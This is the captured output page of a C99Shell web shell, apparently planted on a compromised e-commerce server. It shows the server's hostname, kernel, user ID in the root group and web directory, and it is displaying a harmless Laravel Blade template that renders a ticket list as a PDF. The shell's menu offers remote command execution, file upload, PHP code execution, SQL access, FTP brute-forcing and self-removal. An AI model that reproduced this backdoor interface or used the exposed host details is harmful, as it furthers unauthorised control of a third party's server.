!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/Modules/Ticket/Resources/views/   drwxr-xr-x
Free 26.88 GB of 117.98 GB (22.78%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     admin_ticket.blade.php (2.88 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('admin.layouts.list_pdf')

@section('pdf-title')
<title>{{ __('Ticket Lists') }}</title>
@endsection

@section('header-info')
<td colspan="2" class="tbody-td">
    <p class="title">
      <span class="title-text"></span><strong>{{ __('Ticket Lists') }}</strong>
    </p>
    @if (isset($assigneeSelected) && !empty($assigneeSelected))
    <p class="title">
      <span class="title-text">{{ __('Assignee:') }} </span>{{ $assigneeSelected->name }}
    </p>
    @endif

    @if (isset($departmentSelected) && !empty($departmentSelected))
    <p class="title">
      <span class="title-text">{{ __('Department:') }} </span>{{ $departmentSelected->name }}
    </p>
    @endif
    @if (isset($statusSelected) && !empty($statusSelected))
    <p class="title">
      <span class="title-text">{{ __('Department:') }} </span>{{ $statusSelected->name }}
    </p>
    @endif
    @if (isset($date_range) && !empty($date_range))
      <p class="title">
        <span class="title-text">{{ __('Period:') }} </span> {{ $date_range }}
      </p>
    @endif
    <p class="title">
      <span class="title-text">{{ __('Print Date:') }} </span> {{ formatDate(date('d-m-Y')) }}
    </p>
</td>
@endsection

@section('list-table')
<table class="list-table">
    <thead class="list-head">
        <tr>
          <td class="text-center list-td"> {{ __('Subject') }} </td>
          <td class="text-center list-td"> {{ __('Assignee') }} </td>
          <td class="text-center list-td"> {{ __('Department') }} </td>
          <td class="text-center list-td"> {{ __('Vendor') }} </td>
          <td class="text-center list-td"> {{ __('Status') }} </td>
          <td class="text-center list-td"> {{ __('Priority') }} </td>
          <td class="text-center list-td"> {{ __('Last Reply') }} </td>
          <td class="text-center list-td"> {{ __('Created at') }} </td>
        </tr>
    </thead>
    @foreach ($ticketList as $data)
      <tr>
        <td class="text-center list-td"> {{ $data->subject }}
        </td>
        <td class="text-center list-td"> {{ optional($data->user)->name }} </td>
        <td class="text-center list-td"> {{ optional($data->department)->name }} </td>
        <td class="text-center list-td"> {{ optional($data->vendor)->name }} </td>
        <td class="text-center list-td"> {{ optional($data->threadStatus)->name }} </td>
        <td class="text-center list-td"> {{ optional($data->priority)->name }} </td>
        <td class="text-center list-td">
        @if($data->last_reply && $data->last_reply != $data->date)
          {{ timeZoneFormatDate($data->last_reply) }}<br>{{ timeZoneGetTime($data->last_reply) }}
        @else
          {{ __('Not Reply Yet') }}
        @endif
        </td>
        <td class="text-center list-td"> {{ timeZoneFormatDate($data->date) }}<br>{{ timeZoneGetTime($data->date) }} </td>
      </tr>
    @endforeach
</table>
@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0039 ]--